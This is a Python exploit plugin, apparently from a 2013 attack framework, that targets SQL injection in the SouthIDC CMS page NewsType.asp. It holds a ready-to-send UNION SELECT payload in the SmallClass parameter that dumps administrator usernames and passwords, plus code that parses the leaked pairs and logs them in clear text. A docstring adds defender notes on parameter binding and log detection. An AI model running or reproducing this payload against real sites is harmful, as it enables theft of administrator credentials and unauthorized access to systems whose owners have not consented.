# -*- coding: utf-8 -*-
class mstplugin:
    """Check a SouthIDC site for SQL injection in ``NewsType.asp``.

    The names ``fuck``, ``color``, ``URL``, ``PORT``, ``PATH`` and the
    colour constants are not defined in this file; presumably the host
    framework injects them before ``exploit`` runs (confirm against the
    loader).

    Defender notes:
    * The request only yields data if the server concatenates the
      ``SmallClass`` query parameter into its SQL text. Binding it as a
      query parameter, or validating it strictly, closes the hole.
    * The request carries ``union select`` in the query string of
      ``NewsType.asp``, so it is visible in web-server access logs and
      can be matched by a WAF/IDS rule.
    * Recovered ``username|password`` values are printed and handed to
      ``fuck.writelog`` as plain text; treat that log as sensitive.
    """

    # Plugin metadata as [key, value] pairs.
    infos = [
        ['Plugin', 'SouthIDC NewsType.asp SqlInject Exp'],
        ['Author', 'mst'],
        ['Update', '2013/10/20'],
        ['site', 'http://mstoor.duapp.com'],
    ]
    # Options; the layout looks like [name, default, description],
    # to be confirmed against the framework.
    opts = [
        ['URL', 'localhost', 'Url'],
        ['PATH', '/', 'Cms path'],
        ['PORT', '80', 'port'],
    ]

    def exploit(self):
        """Send one crafted GET request and report any leaked admin rows.

        Prints status through ``color.cprint`` and records every extracted
        value with ``fuck.writelog``. Returns ``None`` on every path.
        """
        base = fuck.urlformate(URL, PORT, PATH)
        # The SmallClass value closes the string literal in the server's query
        # and appends a UNION SELECT over the `admin` table. %2BCHR(124)%2B is
        # "+CHR(124)+", which joins username and password with "|".
        probe = base + "NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='"
        color.cprint("[*] Sending exp..", YELLOW)
        reply = fuck.urlget(probe)

        # Only an HTTP 200 body is inspected; any other status is reported
        # and the check stops there.
        if reply.getcode() != 200:
            color.cprint("[!] EXPLOIT FALSE ! CODE:%s" % reply.getcode(), RED)
            return

        # Looks for "word|word" sitting directly between ">" and "<",
        # i.e. the joined pair rendered as the text of an HTML element.
        hits = fuck.find(r'[>]+\w+[|]+\w+[<]+', reply.read())
        if len(hits) == 0:
            color.cprint("[!] TARGET NO VULNERABLE !", RED)
            return

        color.cprint("[*] Exploit Successful !", GREEN)
        for idx, hit in enumerate(hits):
            # Drop the first and last character (the surrounding > and <).
            pair = hit[1:-1]
            color.cprint("[%s] %s" % (idx, pair), GREEN)
            # NOTE(review): credentials are logged in clear text here.
            fuck.writelog("southidc_newstype_sqli", URL + "::" + pair)
